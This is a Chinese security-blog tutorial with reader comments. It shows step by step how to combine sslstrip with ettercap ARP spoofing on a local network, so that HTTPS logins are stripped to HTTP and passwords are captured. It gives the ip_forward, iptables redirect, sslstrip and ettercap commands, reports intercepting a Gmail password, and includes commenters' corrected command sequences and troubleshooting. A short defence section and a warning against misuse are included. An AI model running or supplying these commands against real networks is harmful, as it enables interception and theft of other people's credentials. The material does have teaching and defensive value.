嗅密码

嗅密码
FB招聘站
分类阅读
专栏
公开课
FIT 2019
企业服务
用户服务
搜索
投稿
登录
注册
利用sslstrip和ettercap突破ssl嗅探密码 xfk认证作者2012-10-16共2092097人围观 ，发现 48 个不明物体 WEB安全
本教程不是原创，是使用黑帽大会上Moxie Marlinspike发布的一款叫sslstrip的工具，配合ettercap进行arp欺骗，可以突破经过ssl加密的协议(如https等，一种被动使用https协议的会受到攻击），进行局域网arp嗅探获得口令等信息。本教程不涉及原理，只讲应用，我尽量迅速录完节省大家时间 仍然跟大家说声抱歉，因为个人原因最近比较惆怅，因此不爱说话，所以还是不录语音教程了，见谅！

准备工作：

下载sslstrip:

wget http://www.thoughtcrime.org/software/sslstrip-0.7.tar.gz
访问这里获得更多帮助:

http://www.thoughtcrime.org/software/sslstrip/
安装：

切换到下载目录执行：

python setup.py install
开始之前先要打开ip_forword转发，否而会出现一些错误，感兴趣的可以查找相关资料并自行测试…纸上得来终觉浅，屏幕上就更浅了，实践出真知

echo “1”>/proc/sys/net/ipv4/ip_forward
使用Iptables过滤数据包

iptables -t nat -A PREROUTING -p tcp –destination-port 80 -j REDIRECT –to-port 10000
通过iptables 把所有http数据导入到10000端口，我们用sslstrip监听10000端口，并得到我们想要的数据

参数讲解:

-t:命令要操作匹配的表（net这个表表示被查询时遇到了新差生的连接包）
Net表有三个内建的链构成 PREROUTING(修改到来的包)、OUTPUT（修改路由之前本地的包）、POSTROUTING(修改准备出去的包)
-A表示在选择的链后加入更多选项
–p指被过滤包的协议
–destination-port 80指被过滤包的目的端口是80 -j REDIRECT –to-port 10000 将80端口的数据跳转到指定端口传输
然后我们使用sslstrip监听10000端口

sslstrip -l 10000
利用ettercap进行arp欺骗

前面一些文章已经讲过了关于DNS和ARP中间人攻击的例子，大家可以翻出来看看。

ettercap使用方法，参数详解：

-P 使用插件
-T 使用基于文本界面
-q 启动安静模式（不回显）
-M 启动ARP欺骗攻击
// // 代表欺骗的子网网络，如果网络中有多个主机的话，可以在第一个//中加上目标主机，第二个//中加上网关路由ip。

此外我们可以综合这些参数使用。

ettercap –T –q –M arp:remote /192.168.1.101/ //
Ettercap默认就会过滤密码，我们也不需要指定过滤脚本

Ok开始测试

echo “1”>/proc/sys/net/ipv4/ip_forward
iptables -t nat -A PREROUTING -p tcp –destination-port 80 -j REDIRECT –to-port 10000
sslstrip -l 10000

会在运行的当前目录生成sslstrip.log我们用ettercap不看这个也可以~~~

Arp欺骗开始，我对我的物理机192.168.1.101进行攻击测试

ettercap –T –q –M arp:remote /192.168.1.101/ //

好的开始了，我登陆gmail看看 Ettercap成功截获到了gmail的密码~~~

这里用ettercap密码非常方便就看到了也可以查看sslstrip的日志文件，也是保存了我们的密码

严禁用于攻击别人银行等账号！这是一种盗窃！

下面说下防御

Sslstrip的攻击方式是一种中间人攻击，需要进行arp欺骗，所以在设置好浏览器本身安全的基础上，要绑定mac和ip等在网关和本机双向绑定，或者启用arp防火墙对arp攻击进行防御

xfk
5 篇文章
等级： 3级
||
上一篇：内网(域)渗透之常见命令(续)下一篇：分享一个最近linux渗透测试案例中碰到的Tips
这些评论亮了

nick 回复
为什么要用端口转发呢，不能直接监听80
？
)21(亮了

天朝黑阔 回复
这个不是2年前的东西吗？记得linux520有这个视频
)16(亮了

thanks (8级)FreeBuf常务处主任回复
原理方面补充推荐一篇paper
http://www.linuxde.net/2011/11/2522.html
)8(亮了

Flamingo (2级)回复
@小酸梅果 不能显示HTTPS的页面才正常。因为在被攻击者的浏览器上只能看见正常的HTTP页面，而HTTPS的一切通讯都是由攻击者与服务器之间进行的。
)7(亮了

白菜 回复
https ->http
)7(亮了
发表评论已有 46 条评论

白菜 2012-10-16回复 1楼
https ->http

亮了(7)

thanks 认证作者专栏作者(8级) FreeBuf常务处主任 2012-10-16回复 2楼
原理方面补充推荐一篇paper

http://www.linuxde.net/2011/11/2522.html
亮了(8)

global_hacker (4级) 2012-10-23回复
@thanks 哈哈哈 不错顶 你小子一下

亮了(5)

xfk 认证作者(3级) 绿盟安全工程师 2012-10-16回复 3楼
@thanks

不错，谢过！

亮了(3)

天朝黑阔 2012-10-16回复 4楼
这个不是2年前的东西吗？记得linux520有这个视频

亮了(16)

lonelyking 2012-10-16回复 5楼
不知道大家有没有用过，他人点开网站 会有证书提示。

亮了(5)

xfk 认证作者(3级) 绿盟安全工程师 2012-10-16回复 6楼
@天朝黑阔

嗯，是的，在linux520上找到了

亮了(5)

xfk 认证作者(3级) 绿盟安全工程师 2012-10-16回复 7楼
@lonelyking

不会提示证书错误，@thanks大牛给出了连接http://www.linuxde.net/2011/11/2522.html

亮了(5)

livers (2级) 2012-10-16回复
@xfk 以前是弹出警告 这里是把https替换成http

亮了(3)

avenwu 2014-10-14回复
@livers http如何替换https，这个过程不会有证书错误提示？

亮了(4)

chnlcq (1级) 2012-10-17回复 8楼
经过测试不知道为什么没有成功！可否指导一下呢？

亮了(6)

F4ck (1级) 2012-10-17回复 9楼
哈哈 以前在课堂上给我同学演示过.不过现在 好久没碰BT了

亮了(4)

xfk 认证作者(3级) 绿盟安全工程师 2012-10-17回复 10楼
@chnlcq

经测试，是成功的。或者是你的环境有问题

亮了(4)

小酸梅果 (1级) 2013-01-04回复
@xfk 你好，我也测试了，但是一旦开始，目的主机就不能登陆https网页，从正常的http调转到登陆页面也不行，这是什么原因呢。sslstrip不是可以自动把https替换成http吗？

亮了(4)

Flamingo (2级) 2013-01-20回复
@小酸梅果 不能显示HTTPS的页面才正常。因为在被攻击者的浏览器上只能看见正常的HTTP页面，而HTTPS的一切通讯都是由攻击者与服务器之间进行的。

亮了(7)

小酸梅果 (1级) 2013-01-21回复
@Flamingo 那gmail邮箱登陆过程中不是从http跳转到https的吗？

另外我想实现https中间人攻击的实验过程，在伪造证书时一直有问题，想请教

亮了(4)

night 2012-10-17回复 11楼
这个就是做了个ssl卸载。

亮了(6)

养树熊的大长腿 2012-10-19回复 12楼
转发微博

亮了(3)

global_hacker (4级) 2012-10-23回复 13楼
哈哈 520 很多的

亮了(5)

ashy (1级) 2012-12-19回复 14楼
小菜问句~~能针对别的邮箱不？163的或者TX的？

亮了(3)

nick 2013-05-31回复 15楼
为什么要用端口转发呢，不能直接监听80

？

亮了(21)

toor 2015-06-18回复
@ nick 兄弟这么多年过去了，你搞明白了没有啊。为什么不直接监听80？

亮了(5)

toy 2014-02-24回复 16楼
https不是443端口么？http才是80啊？

亮了(2)

bruclan (2级) 2014-08-11回复
@toy 先发送到80进行ssl握手之类的前奏，当远端的服务器接到浏览器要进行ssl加密通信请求并返回证书后，在你本地确认后再建立真正的443端口上的加密通信。该工具的要点就是在“握手之类的前奏”阶段截获浏览器发送的加密请求信息，然后通过中间人进行伪造，让受害者认为自己是在和远程进行加密通信，明白了吧。

亮了(2)

gbm (2级) GOD BLESS ME 2014-03-17回复 17楼
先搞明白80和443的区别吧。小编请审核

亮了(0)

情到深处人孤 (1级) 2014-07-26回复 18楼
为什么我开数据导入到10000端口，显示 bad argument 80…..

亮了(2)

123 2014-12-27回复
@ 情到深处人孤 iptables -t nat -A PREROUTING -p tcp –destination-port 80 -j REDIRECT –to-port 10000

楼主这句错了，–destination-port和 –to-port有两个–

亮了(1)

修电脑的Owl 2014-10-06回复 19楼
啊，草-。-我才不是黑客，我就是一小白

亮了(0)

voidmorn 2014-10-06回复 20楼
我替他回复你：全国有被盗号的先例吗？顶级黑客会对普通民众下手吗？

亮了(0)

voidmorn 2014-10-06回复 21楼
中国的教育网部分地区的google.com也有https问题，说不准在搞什么鬼，感觉和gfw有关。等白天了给你看图。

亮了(0)

asy 2014-10-06回复 22楼
我非常想问下 经我测试 arp时对方会断线 上不了网，请问lz 你在本地环境和虚拟机mac是相同的 所以 在arp时本机可以上网 但是 你arp 别人时 人家都不能上网 你何谈嗅探？ 还是有什么方法是把对方流量转发给你 你在给路由器 然后 外面的流量也是先经过你 再给目标pc的呢 请指导下 谢谢

亮了(4)

anon 2015-07-05回复
Just do the arp poisning without changing fowarding settings, U can get the data with wireshark

亮了(1)

asy 2014-10-06回复 23楼
还有 我是在本地虚拟机用kali ip 192.168.1.127 本机ip 192.168.1.113 目标机 ip 192.168.1.115 网关 192.168.1.1 我试过 arpspoof ettercap 都是在arp的时候 对方马上就不能上网了

亮了(1)

rosuremember (1级) 2014-11-04回复
@asy ，需要开启ip路由转发；

echo “1”>/proc/sys/net/ipv4/ip_forward

亮了(1)

1979 (1级) 2015-01-29回复
@ rosuremember

echo “1”>/proc/sys/net/ipv4/ip_forward 这个命令，我是vm里面通过了，但是用cat查看，里面还是零的，最后去除了双引号就成功了。vm里面装的是BackTrack-v5r3.vmdk。

亮了(0)

pegax64 (1级) 2015-06-25回复
@ asy 我也遇到这种情况，ip_forward 已经打开了。在家里的网络就没问题，在公司的网络就不能上网，难道跟路由器有关？

亮了(0)

习惯一步之遥的B1nGzL 2014-10-06回复 24楼
你居然和这个微博最大逗比和及其逗比粉丝交流，不怕被传染吗？

亮了(1)

voidmorn 2014-10-06回复 25楼
能联系吉尼斯吗？

亮了(1)

waldoo 2014-10-16回复 26楼
–destination-port 参数少个-

亮了(2)

123 2014-12-27回复 27楼
iptables -t nat -A PREROUTING -p tcp –destination-port 80 -j REDIRECT –to-port 10000

楼主这句错了，–destination-port和 –to-port有两个–

亮了(1)

1979 (1级) 2015-01-29回复 28楼
我失败了，在vmware桥接实体机器的基础做的。

按照上文，的确有些命令会提示错误。修改后，我检查过实体机，arp-a后，实体机的网关MAC并没有改变，也就是arp攻击那里就是失败了。。。

然后，安装上面Fer的连接试了一下，命令都通过了，并且arp攻击成功。奇怪的是，实体机的网关MAC显示并不是VMnet0的mac，然后上网是偶尔异常，有时可以打开，有时打不开。不知道哪里错了。下面将配置粘贴一下，有人愿意帮忙远程判断一下原因吗？

配置：

sudo ifconfig eth0 192.168.100.200 netmask 255.255.255.0

sudo route add default gw 192.168.100.1

vi /etc/resolv.conf

cat /etc/resolv.conf

nameserver 192.168.100.1

nameserver 8.8.8.8

echo 1 >/proc/sys/net/ipv4/ip_forward

iptables -t nat -A PREROUTING -p tcp –destination-port 80 -j REDIRECT –to-ports 10000

arpspoof -i eth0 -t 192.168.100.110 192.168.100.1

sslstrip -a -k -f

ettercap -T -q -i eth0

ARP攻击与VMnet参数

eth0 Link encap:Ethernet HWaddr 00:0c:29:e4:b3:c1

inet addr:192.168.100.121 Bcast:192.168.100.255 Mask:255.255.255.0

inet6 addr: fe80::20c:29ff:fee4:b3c1/64 Scope:Link

UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1

RX packets:9231 errors:0 dropped:0 overruns:0 frame:0

TX packets:5824 errors:0 dropped:0 overruns:0 carrier:0

collisions:0 txqueuelen:1000

RX bytes:4819757 (4.8 MB) TX bytes:662221 (662.2 KB)

Interrupt:19 Base address:0×2000

0:c:29:e4:b3:c1 0:0:0:0:0:0 0806 42: arp reply 192.168.100.1 is-at 0:c:29:e4:b3:c1

接口: 192.168.100.110 — 0×16 欺骗前的arp -a

Internet 地址 物理地址 类型

192.168.100.1 d0-c7-c0-f4-5d-44 动态

192.168.100.101 28-d2-44-9c-0a-43 动态

192.168.100.103 8c-be-be-fa-d3-fd 动态

192.168.100.255 ff-ff-ff-ff-ff-ff 静态

224.0.0.22 01-00-5e-00-00-16 静态

224.0.0.252 01-00-5e-00-00-fc 静态

239.255.255.250 01-00-5e-7f-ff-fa 静态

255.255.255.255 ff-ff-ff-ff-ff-ff 静态

接口: 192.168.100.110 — 0×16 欺骗后的arp -a

Internet 地址 物理地址 类型

192.168.100.1 20-7c-8f-05-a9-e8 动态

192.168.100.101 28-d2-44-9c-0a-43 动态

192.168.100.103 8c-be-be-fa-d3-fd 动态

192.168.100.255 ff-ff-ff-ff-ff-ff 静态

224.0.0.22 01-00-5e-00-00-16 静态

224.0.0.252 01-00-5e-00-00-fc 静态

239.255.255.250 01-00-5e-7f-ff-fa 静态

255.255.255.255 ff-ff-ff-ff-ff-ff 静态

第一次发言，希望遇到FBer指导一下。

亮了(1)

网路游侠 2015-03-17回复 29楼
哈哈 文章开头写了。。。。第一行 文章来自FreeBuf黑客与极客

亮了(0)

向日 2015-05-31回复 30楼
我想问下，gmali本身是明文密码？还是加密的也能显示明文？我在虚拟机里测试百度的，现在百度都https了，但我xp的ie浏览器还是显示http，而且也能打开。但是抓取的密码都是加密过的。

亮了(0)

test 2015-07-05回复
U mean base64 ; )

亮了(0)

qq545501014 (1级) 2016-02-06回复 31楼
请问一下,sslstrip.log如何查看 , 用什么字符集打开?

亮了(1)

薄荷叶 2016-09-17回复 32楼
第一种攻击方式公钥固定扩展(HPKP)可以有效抵挡攻击，第二种本质上是ssl剥离攻击 网站部署HSTS就好了

亮了(2)
昵称
请输入昵称
必须您当前尚未登录。登陆？注册邮箱
请输入邮箱地址
必须（保密）表情插图
有人回复时邮件通知我

xfk认证作者

绿盟安全工程师

5
文章数
44
评论数
最近文章
短信炸弹—用Python模拟ajax请求
2013.04.08

继Adobe漏洞后 黑客声称控制了部分雅虎服务器
2012.12.17

XSS获取cookie并利用
2012.11.12

浏览更多
相关阅读
OpenStack：建立虚拟的渗透测试实验环境 – 网络篇关于”windows 2008如何安装Cobalt Strike”的一些想法新手指南：如何用Ettercap实现“中间人攻击”（附下载链接）ANDRAX：最新的Android智能手机上的渗透测试平台自动化渗透测试工具包APT2
特别推荐

关注我们 分享每日精选文章

活动预告
11月

FreeBuf精品公开课·双11学习狂欢节 | 给努力的你打打气
已结束
10月

【16课时-连载中】挖掘CVE不是梦（系列课程2）
已结束
10月

【首节课仅需1元】挖掘CVE不是梦
已结束
9月

【已结束】自炼神兵之自动化批量刷SRC
已结束
FREEBUF免责声明协议条款关于我们加入我们广告及服务寻求报道广告合作联系我们友情链接关注我们
官方微信
新浪微博腾讯微博Twitter赞助商
Copyright © 2018 WWW.FREEBUF.COM All Rights Reserved 沪ICP备13033796号
css.php 正在加载中...0daybank